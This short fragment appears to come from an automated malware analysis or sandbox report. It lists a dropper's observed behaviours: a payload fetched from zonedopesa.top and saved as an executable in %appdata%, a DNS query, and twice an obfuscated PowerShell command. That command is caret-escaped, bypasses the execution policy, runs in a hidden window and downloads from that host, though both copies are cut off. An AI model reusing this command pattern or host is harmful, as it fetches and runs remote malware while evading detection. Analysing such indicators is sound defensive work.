Technical Information
- http://www.zonedopesa.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwERSHeLL.EXe -EXECU^tIon^POlIc^y B^Y^pas^s ^-NopRofIlE^ ^-W^iNdOWSTYLe^ ^HI^D^de^n^ (^ne^w-^Ob^jeC^T SYSt^Em.Ne^T.WeBcL^ieNt).dO^w^N^LO^ADFIlE^(^'http://www.zonedopesa.top/re...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "POwERSHeLL.EXe -EXECU^tIon^POlIc^y B^Y^pas^s ^-NopRofIlE^ ^-W^iNdOWSTYLe^ ^HI^D^de^n^ (^ne^w-^Ob^jeC^T SYSt^Em.Ne^T.WeBcL^ieNt).dO^w^N^LO^ADFIlE^(^'http://www.zonedopesa.top/re...' (with hidden window)